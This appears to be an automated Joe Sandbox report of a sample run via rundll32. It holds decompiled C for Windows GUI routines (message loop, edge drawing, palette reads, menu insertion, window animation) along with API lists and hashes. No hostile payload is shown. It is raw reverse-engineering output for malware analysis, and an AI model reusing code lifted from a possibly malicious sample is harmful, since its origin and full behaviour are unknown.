                          0x02820ab0
                          0x02820aba
                          0x02820abb
                          0x02820abd
                          0x02820ac2
                          0x02820ac6
                          0x02820ace
                          0x02820ad2
                          0x02820ad5
                          0x02820ada
                          0x02820adb
                          0x00000000
                          0x02820adb
                          0x02820c4d

                          APIs
                          • 744713C0.COMCTL32(00000000,?,00000000,?,?,00000000,00000000,00000000,00000000,?), ref: 02820ADB
                          • 744713C0.COMCTL32(00000000,?,00000000,00000000,00000000,00000000,00000000,000000FF,00000000,00000000), ref: 02820B7C
                          • SetTextColor.GDI32(00000000,00FFFFFF), ref: 02820BC9
                          • SetBkColor.GDI32(00000000,00000000), ref: 02820BD1
                          • BitBlt.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,00E20746), ref: 02820BF6
                            • Part of subcall function 02820A54: 74471240.COMCTL32(00000000,?,02820AB5,00000000,?), ref: 02820A6A
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: 744713Color$74471240Text
                          • String ID:
                          • API String ID: 3858318345-0
                          • Opcode ID: 784ab0d315fdd34ebb0636565c13920544a6494feb11af477f7add41b1a2d62e
                          • Instruction ID: e151ed0517eb7fb7366694b5035504945cd1b3e157513500d6d20112353928f3
                          • Opcode Fuzzy Hash: 784ab0d315fdd34ebb0636565c13920544a6494feb11af477f7add41b1a2d62e
                          • Instruction Fuzzy Hash: FB51F575704214AFDB96EF6CCD85FAA37AEAF48710F100155FA04EB386CA70E8458B66
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0281A5E4 Relevance: 12.1, APIs: 8, Instructions: 144windowCOMMON
                          Download Yara Rule
                          C-Code - Quality: 75%
                          			E0281A5E4(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v22;
				intOrPtr _v28;
				struct HWND__* _v32;
				char _v36;
				intOrPtr _t52;
				intOrPtr _t58;
				intOrPtr _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				intOrPtr _t73;
				intOrPtr _t85;
				intOrPtr _t87;
				void* _t96;
				intOrPtr _t125;
				void* _t127;
				void* _t128;
				void* _t130;
				void* _t131;
				intOrPtr _t132;

				_t128 = __esi;
				_t127 = __edi;
				_t111 = __ebx;
				_t130 = _t131;
				_t132 = _t131 + 0xffffffe0;
				_push(__ebx);
				_v36 = 0;
				_v8 = __eax;
				_push(_t130);
				_push(0x281a8be);
				_push( *[fs:eax]);
				 *[fs:eax] = _t132;
				E0282BF88();
				if( *((char*)(_v8 + 0x57)) != 0 ||  *((intOrPtr*)( *_v8 + 0x50))() == 0 || ( *(_v8 + 0x2f4) & 0x00000008) != 0 ||  *((char*)(_v8 + 0x22f)) == 1) {
					_t52 =  *0x28644f4; // 0x27f5404
					E027D6018(_t52,  &_v36);
					E027DBBC4(_v36, 1);
					E027D3A9C();
				}
				if(GetCapture() != 0) {
					SendMessageA(GetCapture(), 0x1f, 0, 0);
				}
				ReleaseCapture();
				_t58 =  *0x2865b58; // 0x41d1544
				E0281D488(_t58);
				_push(_t130);
				_push(0x281a8a1);
				_push( *[fs:eax]);
				 *[fs:eax] = _t132;
				 *(_v8 + 0x2f4) =  *(_v8 + 0x2f4) | 0x00000008;
				_v32 = GetActiveWindow();
				_t63 =  *0x2863c90; // 0x0
				_v20 = _t63;
				_t64 =  *0x2865b5c; // 0x41d1150
				_t20 = _t64 + 0x78; // 0x0
				_t65 =  *0x2865b5c; // 0x41d1150
				_t21 = _t65 + 0x7c; // 0x41d1394
				E027EB25C( *_t21,  *_t20, 0);
				_t68 =  *0x2865b5c; // 0x41d1150
				 *((intOrPtr*)(_t68 + 0x78)) = _v8;
				_t69 =  *0x2865b5c; // 0x41d1150
				_t24 = _t69 + 0x44; // 0x0
				_v22 =  *_t24;
				_t71 =  *0x2865b5c; // 0x41d1150
				E0281C130(_t71,  *_t20, 0);
				_t73 =  *0x2865b5c; // 0x41d1150
				_t26 = _t73 + 0x48; // 0x0
				_v28 =  *_t26;
				_v16 = E0281331C(0, _t111, _t127, _t128);
				_push(_t130);
				_push(0x281a87f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t132;
				E0281A51C(_v8);
				_push(_t130);
				_push(0x281a7d3);
				_push( *[fs:eax]);
				 *[fs:eax] = _t132;
				SendMessageA(E02833F7C(_v8), 0xb000, 0, 0);
				 *((intOrPtr*)(_v8 + 0x24c)) = 0;
				do {
					_t85 =  *0x2865b58; // 0x41d1544
					E0281E544(_t85);
					_t87 =  *0x2865b58; // 0x41d1544
					if( *((char*)(_t87 + 0x9c)) == 0) {
						if( *((intOrPtr*)(_v8 + 0x24c)) != 0) {
							E0281A470(_v8);
						}
					} else {
						 *((intOrPtr*)(_v8 + 0x24c)) = 2;
					}
				} while ( *((intOrPtr*)(_v8 + 0x24c)) == 0);
				_v12 =  *((intOrPtr*)(_v8 + 0x24c));
				SendMessageA(E02833F7C(_v8), 0xb001, 0, 0);
				_t96 = E02833F7C(_v8);
				if(_t96 != GetActiveWindow()) {
					_v32 = 0;
				}
				_pop(_t125);
				 *[fs:eax] = _t125;
				_push(0x281a7da);
				return E0281A508(_v8);
			}





























                          0x0281a5e4
                          0x0281a5e4
                          0x0281a5e4
                          0x0281a5e5
                          0x0281a5e7
                          0x0281a5ea
                          0x0281a5ed
                          0x0281a5f0
                          0x0281a5f5
                          0x0281a5f6
                          0x0281a5fb
                          0x0281a5fe
                          0x0281a601
                          0x0281a60d
                          0x0281a636
                          0x0281a63b
                          0x0281a64a
                          0x0281a64f
                          0x0281a64f
                          0x0281a65b
                          0x0281a669
                          0x0281a669
                          0x0281a66e
                          0x0281a673
                          0x0281a678
                          0x0281a67f
                          0x0281a680
                          0x0281a685
                          0x0281a688
                          0x0281a68e
                          0x0281a69a
                          0x0281a69d
                          0x0281a6a2
                          0x0281a6a5
                          0x0281a6aa
                          0x0281a6ad
                          0x0281a6b2
                          0x0281a6b7
                          0x0281a6bc
                          0x0281a6c4
                          0x0281a6c7
                          0x0281a6cc
                          0x0281a6d0
                          0x0281a6d6
                          0x0281a6db
                          0x0281a6e0
                          0x0281a6e5
                          0x0281a6e8
                          0x0281a6f2
                          0x0281a6f7
                          0x0281a6f8
                          0x0281a6fd
                          0x0281a700
                          0x0281a706
                          0x0281a70d
                          0x0281a70e
                          0x0281a713
                          0x0281a716
                          0x0281a72b
                          0x0281a735
                          0x0281a73b
                          0x0281a73b
                          0x0281a740
                          0x0281a745
                          0x0281a751
                          0x0281a76c
                          0x0281a771
                          0x0281a771
                          0x0281a753
                          0x0281a756
                          0x0281a756
                          0x0281a779
                          0x0281a78b
                          0x0281a7a0
                          0x0281a7a8
                          0x0281a7b6
                          0x0281a7ba
                          0x0281a7ba
                          0x0281a7bf
                          0x0281a7c2
                          0x0281a7c5
                          0x0281a7d2

                          APIs
                          • GetCapture.USER32 ref: 0281A654
                          • GetCapture.USER32 ref: 0281A663
                          • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 0281A669
                          • ReleaseCapture.USER32 ref: 0281A66E
                          • GetActiveWindow.USER32 ref: 0281A695
                          • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 0281A72B
                          • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 0281A7A0
                          • GetActiveWindow.USER32 ref: 0281A7AF
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: CaptureMessageSend$ActiveWindow$Release
                          • String ID:
                          • API String ID: 862346643-0
                          • Opcode ID: 67bb4b09ee0102bd784c8eb2725d0641cb9244375233afd4db0ca43c738994d2
                          • Instruction ID: a3f474946075c734dc851b7ae158a605c0505d1f7b979f67427614e1665919ec
                          • Opcode Fuzzy Hash: 67bb4b09ee0102bd784c8eb2725d0641cb9244375233afd4db0ca43c738994d2
                          • Instruction Fuzzy Hash: 0251287CA41204AFDB15EF69D989B9DB7FAAF08700F5184A0E804EB2A1D774AE40DF51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02831FB8 Relevance: 12.1, APIs: 8, Instructions: 123COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E02831FB8(void* __eax, void* __ecx, struct HDC__* __edx, void* __eflags, intOrPtr _a4) {
				int _v8;
				int _v12;
				int _v16;
				char _v20;
				struct tagRECT _v36;
				signed int _t54;
				intOrPtr _t59;
				int _t61;
				void* _t63;
				void* _t66;
				void* _t82;
				int _t98;
				struct HDC__* _t99;

				_t99 = __edx;
				_t82 = __eax;
				 *(__eax + 0x54) =  *(__eax + 0x54) | 0x00000080;
				_v16 = SaveDC(__edx);
				E0282C064(__edx, _a4, __ecx);
				IntersectClipRect(__edx, 0, 0,  *(_t82 + 0x48),  *(_t82 + 0x4c));
				_t98 = 0;
				_v12 = 0;
				if((GetWindowLongA(E02833F7C(_t82), 0xffffffec) & 0x00000002) == 0) {
					_t54 = GetWindowLongA(E02833F7C(_t82), 0xfffffff0);
					__eflags = _t54 & 0x00800000;
					if((_t54 & 0x00800000) != 0) {
						_v12 = 3;
						_t98 = 0xa00f;
					}
				} else {
					_v12 = 0xa;
					_t98 = 0x200f;
				}
				if(_t98 != 0) {
					SetRect( &_v36, 0, 0,  *(_t82 + 0x48),  *(_t82 + 0x4c));
					DrawEdge(_t99,  &_v36, _v12, _t98);
					E0282C064(_t99, _v36.top, _v36.left);
					IntersectClipRect(_t99, 0, 0, _v36.right - _v36.left, _v36.bottom - _v36.top);
				}
				E0282E93C(_t82, _t99, 0x14, 0);
				E0282E93C(_t82, _t99, 0xf, 0);
				_t59 =  *((intOrPtr*)(_t82 + 0x19c));
				if(_t59 == 0) {
					L12:
					_t61 = RestoreDC(_t99, _v16);
					 *(_t82 + 0x54) =  *(_t82 + 0x54) & 0x0000ff7f;
					return _t61;
				} else {
					_t63 =  *((intOrPtr*)(_t59 + 8)) - 1;
					if(_t63 < 0) {
						goto L12;
					}
					_v20 = _t63 + 1;
					_v8 = 0;
					do {
						_t66 = E027EB1E0( *((intOrPtr*)(_t82 + 0x19c)), _v8);
						_t107 =  *((char*)(_t66 + 0x57));
						if( *((char*)(_t66 + 0x57)) != 0) {
							E02831FB8(_t66,  *((intOrPtr*)(_t66 + 0x40)), _t99, _t107,  *((intOrPtr*)(_t66 + 0x44)));
						}
						_v8 = _v8 + 1;
						_t36 =  &_v20;
						 *_t36 = _v20 - 1;
					} while ( *_t36 != 0);
					goto L12;
				}
			}
















                          0x02831fc3
                          0x02831fc5
                          0x02831fc7
                          0x02831fd3
                          0x02831fdd
                          0x02831fef
                          0x02831ff4
                          0x02831ff8
                          0x0283200d
                          0x02832027
                          0x0283202c
                          0x02832031
                          0x02832033
                          0x0283203a
                          0x0283203a
                          0x0283200f
                          0x0283200f
                          0x02832016
                          0x02832016
                          0x02832041
                          0x02832053
                          0x02832062
                          0x0283206f
                          0x02832087
                          0x02832087
                          0x02832097
                          0x028320a7
                          0x028320ac
                          0x028320b4
                          0x028320f3
                          0x028320f8
                          0x028320fd
                          0x02832109
                          0x028320b6
                          0x028320b9
                          0x028320bc
                          0x00000000
                          0x00000000
                          0x028320bf
                          0x028320c2
                          0x028320c9
                          0x028320d2
                          0x028320d7
                          0x028320db
                          0x028320e6
                          0x028320e6
                          0x028320eb
                          0x028320ee
                          0x028320ee
                          0x028320ee
                          0x00000000
                          0x028320c9

                          APIs
                          • SaveDC.GDI32 ref: 02831FCE
                            • Part of subcall function 0282C064: GetWindowOrgEx.GDI32(55DFEBFF), ref: 0282C072
                            • Part of subcall function 0282C064: SetWindowOrgEx.GDI32(55DFEBFF,55DFEBFF,55DFEBFF,00000000), ref: 0282C088
                          • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 02831FEF
                          • GetWindowLongA.USER32(00000000,000000EC), ref: 02832005
                          • GetWindowLongA.USER32(00000000,000000F0), ref: 02832027
                          • SetRect.USER32(?,00000000,00000000,?,?), ref: 02832053
                          • DrawEdge.USER32(?,?,?,00000000), ref: 02832062
                          • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 02832087
                          • RestoreDC.GDI32(?,?), ref: 028320F8
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Window$Rect$ClipIntersectLong$DrawEdgeRestoreSave
                          • String ID:
                          • API String ID: 2976466617-0
                          • Opcode ID: 37b97656b53d42e730db4731b298e45761733f91c633c8945db713b9403b0ed4
                          • Instruction ID: 8d718bf9b79e91abb01e906e2bac921d113307e04240d7a1887038345e7800c3
                          • Opcode Fuzzy Hash: 37b97656b53d42e730db4731b298e45761733f91c633c8945db713b9403b0ed4
                          • Instruction Fuzzy Hash: 9C416475B00214ABDB11EBACCC84FAE77BEAF44700F104155EA04EB289DB75ED45CBA5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027F8E24 Relevance: 12.1, APIs: 8, Instructions: 79windowCOMMON
                          Download Yara Rule
                          C-Code - Quality: 70%
                          			E027F8E24(void* __ebx) {
				struct HDC__* _v8;
				struct tagPALETTEENTRY _v1000;
				struct tagPALETTEENTRY _v1004;
				struct tagPALETTEENTRY _v1032;
				signed int _v1034;
				short _v1036;
				void* _t24;
				int _t53;
				intOrPtr _t60;
				void* _t62;
				void* _t63;

				_t62 = _t63;
				_v1036 = 0x300;
				_v1034 = 0x10;
				E027D2978(_t24, 0x40,  &_v1032);
				_v8 = GetDC(0);
				_push(_t62);
				_push(0x27f8f21);
				_push( *[fs:eax]);
				 *[fs:eax] = _t63 + 0xfffffbf8;
				_t53 = GetDeviceCaps(_v8, 0x68);
				if(_t53 >= 0x10) {
					GetSystemPaletteEntries(_v8, 0, 8,  &_v1032);
					if(_v1004 != 0xc0c0c0) {
						GetSystemPaletteEntries(_v8, _t53 - 8, 8, _t62 + (_v1034 & 0x0000ffff) * 4 - 0x424);
					} else {
						GetSystemPaletteEntries(_v8, _t53 - 8, 1,  &_v1004);
						GetSystemPaletteEntries(_v8, _t53 - 7, 7, _t62 + (_v1034 & 0x0000ffff) * 4 - 0x420);
						GetSystemPaletteEntries(_v8, 7, 1,  &_v1000);
					}
				}
				_pop(_t60);
				 *[fs:eax] = _t60;
				_push(0x27f8f28);
				return ReleaseDC(0, _v8);
			}














                          0x027f8e25
                          0x027f8e2e
                          0x027f8e37
                          0x027f8e4b
                          0x027f8e57
                          0x027f8e5c
                          0x027f8e5d
                          0x027f8e62
                          0x027f8e65
                          0x027f8e73
                          0x027f8e78
                          0x027f8e8d
                          0x027f8e9c
                          0x027f8f03
                          0x027f8e9e
                          0x027f8eb1
                          0x027f8ecf
                          0x027f8ee3
                          0x027f8ee3
                          0x027f8e9c
                          0x027f8f0a
                          0x027f8f0d
                          0x027f8f10
                          0x027f8f20

                          APIs
                          • GetDC.USER32(00000000), ref: 027F8E52
                          • GetDeviceCaps.GDI32(?,00000068), ref: 027F8E6E
                          • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 027F8E8D
                          • GetSystemPaletteEntries.GDI32(?,-00000008,00000001,00C0C0C0), ref: 027F8EB1
                          • GetSystemPaletteEntries.GDI32(?,00000000,00000007,?), ref: 027F8ECF
                          • GetSystemPaletteEntries.GDI32(?,00000007,00000001,?), ref: 027F8EE3
                          • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 027F8F03
                          • ReleaseDC.USER32(00000000,?), ref: 027F8F1B
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: EntriesPaletteSystem$CapsDeviceRelease
                          • String ID:
                          • API String ID: 1781840570-0
                          • Opcode ID: 73fbfbb183558bc964ed4a1c9fd10195bdf114f48749c8fe29ee3a65f105e074
                          • Instruction ID: b490a05ffe8949501608b0c6433bd95c43dfb4339cf0aed2a381a0c4b04131e9
                          • Opcode Fuzzy Hash: 73fbfbb183558bc964ed4a1c9fd10195bdf114f48749c8fe29ee3a65f105e074
                          • Instruction Fuzzy Hash: 3E2160B1A54208BEEB51DBA4DD85FAEB3BDEB08704F5104A1F704E72C0E675AE409F25
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 028233AC Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 187windowCOMMON
                          Download Yara Rule
                          C-Code - Quality: 87%
                          			E028233AC(void* __eax, void* __ebx, char __ecx, struct HMENU__* __edx, void* __edi, void* __esi) {
				char _v5;
				char _v12;
				char _v13;
				struct tagMENUITEMINFOA _v61;
				char _v68;
				intOrPtr _t103;
				CHAR* _t109;
				char _t115;
				short _t149;
				void* _t154;
				intOrPtr _t161;
				intOrPtr _t184;
				struct HMENU__* _t186;
				int _t190;
				void* _t192;
				intOrPtr _t193;
				void* _t196;
				void* _t205;

				_t155 = __ecx;
				_v68 = 0;
				_v12 = 0;
				_v5 = __ecx;
				_t186 = __edx;
				_t154 = __eax;
				_push(_t196);
				_push(0x2823607);
				_push( *[fs:eax]);
				 *[fs:eax] = _t196 + 0xffffffc0;
				if( *((char*)(__eax + 0x3e)) == 0) {
					L22:
					_pop(_t161);
					 *[fs:eax] = _t161;
					_push(0x282360e);
					E027D40E8( &_v68);
					return E027D40E8( &_v12);
				}
				E027D4180( &_v12,  *((intOrPtr*)(__eax + 0x30)));
				if(E02825328(_t154) <= 0) {
					__eflags =  *((short*)(_t154 + 0x60));
					if( *((short*)(_t154 + 0x60)) == 0) {
						L8:
						if((GetVersion() & 0x000000ff) < 4) {
							_t190 =  *(0x2863e44 + ((E027D44F4( *((intOrPtr*)(_t154 + 0x30)), 0x282362c) & 0xffffff00 | __eflags == 0x00000000) & 0x0000007f) * 4) |  *0x02863E38 |  *0x02863E28 |  *0x02863E30 | 0x00000400;
							_t103 = E02825328(_t154);
							__eflags = _t103;
							if(_t103 <= 0) {
								InsertMenuA(_t186, 0xffffffff, _t190,  *(_t154 + 0x50) & 0x0000ffff, E027D45A8(_v12));
							} else {
								_t109 = E027D45A8( *((intOrPtr*)(_t154 + 0x30)));
								InsertMenuA(_t186, 0xffffffff, _t190 | 0x00000010, E028238BC(_t154), _t109);
							}
							goto L22;
						}
						_v61.cbSize = 0x2c;
						_v61.fMask = 0x3f;
						_t192 = E028258E4(_t154);
						if(_t192 == 0 ||  *((char*)(_t192 + 0x40)) == 0 && E02824F00(_t154) == 0) {
							if( *((intOrPtr*)(_t154 + 0x4c)) == 0) {
								L14:
								_t115 = 0;
								goto L16;
							}
							_t205 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x4c)))) + 0x1c))();
							if(_t205 == 0) {
								goto L15;
							}
							goto L14;
						} else {
							L15:
							_t115 = 1;
							L16:
							_v13 = _t115;
							_v61.fType =  *(0x2863e78 + ((E027D44F4( *((intOrPtr*)(_t154 + 0x30)), 0x282362c) & 0xffffff00 | _t205 == 0x00000000) & 0x0000007f) * 4) |  *0x02863E70 |  *0x02863E4C |  *0x02863E80 |  *0x02863E88;
							_v61.fState =  *0x02863E58 |  *0x02863E68 |  *0x02863E60;
							_v61.wID =  *(_t154 + 0x50) & 0x0000ffff;
							_v61.hSubMenu = 0;
							_v61.hbmpChecked = 0;
							_v61.hbmpUnchecked = 0;
							_v61.dwTypeData = E027D45A8(_v12);
							if(E02825328(_t154) > 0) {
								_v61.hSubMenu = E028238BC(_t154);
							}
							InsertMenuItemA(_t186, 0xffffffff, 0xffffffff,  &_v61);
							goto L22;
						}
					}
					_t193 =  *((intOrPtr*)(_t154 + 0x64));
					__eflags = _t193;
					if(_t193 == 0) {
						L7:
						_push(_v12);
						_push(0x2823620);
						E02822A10( *((intOrPtr*)(_t154 + 0x60)), _t154, _t155,  &_v68, _t193);
						_push(_v68);
						E027D4468();
						goto L8;
					}
					__eflags =  *((intOrPtr*)(_t193 + 0x64));
					if( *((intOrPtr*)(_t193 + 0x64)) != 0) {
						goto L7;
					}
					_t184 =  *0x28222a0; // 0x28222ec
					_t149 = E027D3398( *((intOrPtr*)(_t193 + 4)), _t184);
					__eflags = _t149;
					if(_t149 != 0) {
						goto L8;
					}
					goto L7;
				}
				_v61.hSubMenu = E028238BC(_t154);
				goto L8;
			}





















                          0x028233ac
                          0x028233b7
                          0x028233ba
                          0x028233bd
                          0x028233c0
                          0x028233c2
                          0x028233c6
                          0x028233c7
                          0x028233cc
                          0x028233cf
                          0x028233d6
                          0x028235e9
                          0x028235eb
                          0x028235ee
                          0x028235f1
                          0x028235f9
                          0x02823606
                          0x02823606
                          0x028233e2
                          0x028233f0
                          0x028233fe
                          0x02823403
                          0x02823448
                          0x02823456
                          0x028235a2
                          0x028235aa
                          0x028235af
                          0x028235b1
                          0x028235e4
                          0x028235b3
                          0x028235b6
                          0x028235cb
                          0x028235cb
                          0x00000000
                          0x028235b1
                          0x0282345c
                          0x02823463
                          0x02823471
                          0x02823475
                          0x0282348c
                          0x0282349a
                          0x0282349a
                          0x00000000
                          0x0282349a
                          0x02823496
                          0x02823498
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0282349e
                          0x0282349e
                          0x0282349e
                          0x028234a0
                          0x028234a0
                          0x028234ef
                          0x02823516
                          0x0282351d
                          0x02823522
                          0x02823527
                          0x0282352c
                          0x02823537
                          0x02823543
                          0x0282354c
                          0x0282354c
                          0x02823558
                          0x00000000
                          0x02823558
                          0x02823475
                          0x02823405
                          0x02823408
                          0x0282340a
                          0x02823424
                          0x02823424
                          0x02823427
                          0x02823433
                          0x02823438
                          0x02823443
                          0x00000000
                          0x02823443
                          0x0282340c
                          0x02823410
                          0x00000000
                          0x00000000
                          0x02823415
                          0x0282341b
                          0x02823420
                          0x02823422
                          0x00000000
                          0x00000000
                          0x00000000
                          0x02823422
                          0x028233f9
                          0x00000000

                          APIs
                          • InsertMenuItemA.USER32(?,000000FF,000000FF,0000002C), ref: 02823558
                          • GetVersion.KERNEL32(00000000,02823607), ref: 02823448
                            • Part of subcall function 028238BC: CreatePopupMenu.USER32 ref: 028238D7
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Menu$CreateInsertItemPopupVersion
                          • String ID: ,$?
                          • API String ID: 133695497-2308483597
                          • Opcode ID: 22d3600ef0d7a31d57b477a23740c375edc2ab108d4df94f1e074aacc6498583
                          • Instruction ID: 3a89e05974f0110166069f5437adc6ef9dc248105ed1acde38dbb935ae468b62
                          • Opcode Fuzzy Hash: 22d3600ef0d7a31d57b477a23740c375edc2ab108d4df94f1e074aacc6498583
                          • Instruction Fuzzy Hash: 2E61243CE00264ABDB11EF78D89469A7BFABF09700F4494E5E944E7346D738D889CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 028354D0 Relevance: 10.7, APIs: 7, Instructions: 156COMMON
                          Download Yara Rule
                          C-Code - Quality: 69%
                          			E028354D0(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _v8;
				void _v12;
				intOrPtr _v16;
				int _v24;
				int _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr* _t80;
				intOrPtr _t91;
				void* _t119;
				intOrPtr _t136;
				intOrPtr* _t145;
				void* _t148;

				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t119 = __ecx;
				_v8 = __eax;
				_t145 =  *0x2864774; // 0x2865b5c
				 *((char*)(_v8 + 0x210)) = 1;
				_push(_t148);
				_push(0x28356a9);
				_push( *[fs:eax]);
				 *[fs:eax] = _t148 + 0xffffffe0;
				E0282D780(_v8, __ecx, __ecx, _t145);
				_v16 = _v16 + 4;
				E0282E9E0(_v8,  &_v28);
				if(E0281B9C0( *_t145) <  *(_v8 + 0x4c) + _v24) {
					_v24 = E0281B9C0( *_t145) -  *(_v8 + 0x4c);
				}
				if(E0281B9E0( *_t145) <  *(_v8 + 0x48) + _v28) {
					_v28 = E0281B9E0( *_t145) -  *(_v8 + 0x48);
				}
				if(E0281B9A0( *_t145) > _v28) {
					_v28 = E0281B9A0( *_t145);
				}
				if(E0281B980( *_t145) > _v16) {
					_v16 = E0281B980( *_t145);
				}
				SetWindowPos(E02833F7C(_v8), 0xffffffff, _v28, _v24,  *(_v8 + 0x48),  *(_v8 + 0x4c), 0x10);
				if(GetTickCount() -  *((intOrPtr*)(_v8 + 0x214)) > 0xfa && E027D43A8(_t119) < 0x64 &&  *0x2863eb8 != 0) {
					SystemParametersInfoA(0x1016, 0,  &_v12, 0);
					if(_v12 != 0) {
						SystemParametersInfoA(0x1018, 0,  &_v12, 0);
						if(_v12 == 0) {
							E02838768( &_v36);
							if(_v32 <= _v24) {
							}
						}
						 *0x2863eb8(E02833F7C(_v8), 0x64,  *0x02863FC0 | 0x00040000);
					}
				}
				_t80 =  *0x28645d4; // 0x2865b58
				_t45 =  *_t80 + 0x30; // 0x0
				E028316B0(_v8,  *_t45);
				ShowWindow(E02833F7C(_v8), 4);
				 *((intOrPtr*)( *_v8 + 0x7c))();
				_pop(_t136);
				 *[fs:eax] = _t136;
				_push(0x28356b0);
				 *((intOrPtr*)(_v8 + 0x214)) = GetTickCount();
				_t91 = _v8;
				 *((char*)(_t91 + 0x210)) = 0;
				return _t91;
			}
















                          0x028354de
                          0x028354df
                          0x028354e0
                          0x028354e1
                          0x028354e2
                          0x028354e4
                          0x028354e7
                          0x028354f0
                          0x028354f9
                          0x028354fa
                          0x028354ff
                          0x02835502
                          0x0283550a
                          0x0283550f
                          0x02835519
                          0x02835530
                          0x0283553f
                          0x0283553f
                          0x02835554
                          0x02835563
                          0x02835563
                          0x02835570
                          0x02835579
                          0x02835579
                          0x02835586
                          0x0283558f
                          0x0283558f
                          0x028355b5
                          0x028355cd
                          0x028355f5
                          0x028355fe
                          0x0283560d
                          0x02835616
                          0x02835624
                          0x0283562f
                          0x0283562f
                          0x0283562f
                          0x02835653
                          0x02835653
                          0x028355fe
                          0x02835659
                          0x02835660
                          0x02835666
                          0x02835676
                          0x02835680
                          0x02835685
                          0x02835688
                          0x0283568b
                          0x02835698
                          0x0283569e
                          0x028356a1
                          0x028356a8

                          APIs
                          • SetWindowPos.USER32(00000000,000000FF,?,?,?,?,00000010,00000000,028356A9), ref: 028355B5
                          • GetTickCount.KERNEL32 ref: 028355BA
                          • SystemParametersInfoA.USER32(00001016,00000000,?,00000000), ref: 028355F5
                          • SystemParametersInfoA.USER32(00001018,00000000,00000000,00000000), ref: 0283560D
                          • AnimateWindow.USER32(00000000,00000064,00000001), ref: 02835653
                          • ShowWindow.USER32(00000000,00000004,00000000,000000FF,?,?,?,?,00000010,00000000,028356A9), ref: 02835676
                            • Part of subcall function 02838768: GetCursorPos.USER32(?), ref: 0283876C
                          • GetTickCount.KERNEL32 ref: 02835690
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
